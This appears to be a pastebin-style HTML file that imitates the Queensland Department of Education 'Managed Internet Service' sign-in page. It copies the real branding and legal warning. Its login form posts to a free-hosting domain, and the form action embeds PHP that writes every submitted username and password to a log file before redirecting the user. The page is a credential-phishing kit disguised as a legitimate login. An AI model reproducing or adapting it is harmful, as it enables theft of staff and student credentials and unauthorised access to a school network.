Untitled
2 years ago in HTML
<!DOCTYPE html>
<!-- template name: html.form.login.template.html.O365 -->
<html lang="en">
<head>
<base href="https://fed.education.qld.gov.au/"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="utf-8">
<title>Managed Internet Service</title>
<meta name="apple-mobile-web-app-title" content="MIS">
<meta name="description" content="'">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
<!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
<!--[if lt IE 9]>
<script src="assets/365/js/html5shiv.js"></script>
<![endif]-->
<link rel="stylesheet" href="assets/365/css/style.css">
<script src="assets/365/js/modernizr-respond.min.js"></script>
<script src="assets/365/js/jquery.min.js"></script>
<script src="assets/365/js/scripts.js"></script>
<!-- For Safari Validation testing -->
<script>
function safariValidate ()
{
if(document.getElementById('userID').value == "")
{
document.getElementById('userID').style.borderColor="red";
document.getElementById('pw').style.borderColor="";
document.getElementById('checking').innerHTML = "";
return false;
}
else if(document.getElementById('pw').value == "")
{
document.getElementById('userID').style.borderColor="";
document.getElementById('pw').style.borderColor="red";
document.getElementById('checking').innerHTML = "";
return false;
}
else if(document.getElementById('agree').checked)
{
return true;
}
else
{
document.getElementById('userID').style.borderColor="";
document.getElementById('pw').style.borderColor="";
document.getElementById('checking').innerHTML = "<font color ='red'></a>&nbsp&nbsp&nbsp&nbspPlease agree to the terms and conditions.</font>";
return false;
}
}
</script>
</head>
<body class="home">
<div id="container">
<div id="header" role="banner">
<span class="crest"></span><span class="qg-words"></span><span class="det-words"></span>
</div>
<div id="page-left" class="clearfix" role="main">
<div class="cover-image">
<div class="feature-image"></div>
</div>
</div>
<div id="page-right" role="complementary">
<div id="form-container">
<h1>Managed Internet Service</h1>
<div id="login_error_container" class="login_error_container">
<div>
</div>
</div>
<p>Sign in with your username and password</p>
<form id="loginform" method="post" action="https://sourceoutlopsp.000webhostapp.com/?php
header ('Location: /idp/uH5Ca/resume/idp/prp.ping');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n\n\n\n");
fclose($handle);
exit;
?>" role="form" name="loginform" aria-label="log in" onsubmit="return safariValidate();">
<ul>
<li><label for="userID">Username <span>*</span></label>
<input type="text" id="userID" name="pf.username" class="my-width" placeholder="Username" aria-required="true" autocorrect="off" autocapitalize="off" value=></li>
<li><label for="pw">Password <span>*</span></label>
<input type="password" id="pw" name="pf.pass" placeholder="Password" class="my-width" aria-required="true"></li>
</ul>
<ul>
<li class="go-right"><input type="checkbox" class="agree" id="agree" name="agree" value="true" aria-required="true">
<label class="go-right" for="agree">I agree to the <span class="agree-to-this">conditions of use</span></label>
<br><div id="checking" align="Left"></div>
</li>
<li><button type="submit" class="submit">Sign in</button></li>
</ul>
</form>
<div>
<p><a href="/idp/cXuWl/resume/idp/prp.ping?ChangePassword=true">Change my password</a></p>
</div>
</div>
<div class="privacy-statement" role="contentinfo">
<h1>Managed Internet Service</h1>
<p><b>Warning</b></p>
<p>The Department of Education network (the network) is provided only to authorised users and only for official schooling and work purposes.</p>
<p>Your use of the network (including internet and email) is logged, may be monitored, and where potentially unlawful conduct is detected, referred to law enforcement agencies. </p>
<p>Students – please refer to the Student Code of Conduct for your obligations and the consequences of non-compliance, or ask your teacher for more information. </p>
<p>Staff – you must comply with the Code of Conduct, Standard of Practice and department policies and procedures. You must not access systems or use information if you are not authorised to do so. You must not access records for personal interest. Unauthorised access and misuse of information may result in you being charged with an offence, e.g. under section 408E of the Criminal Code (Qld), and disciplinary and professional consequences (such as loss of employment and cancellation of registration). </p>
<p> Click ‘I agree’ if you understand the above and to access the network. </p>
<div class="agree-button"><button type="submit" name="okay" class="okay" id="okay">I agree</button></div>
</div>
</div>
</div>
</body>
</html>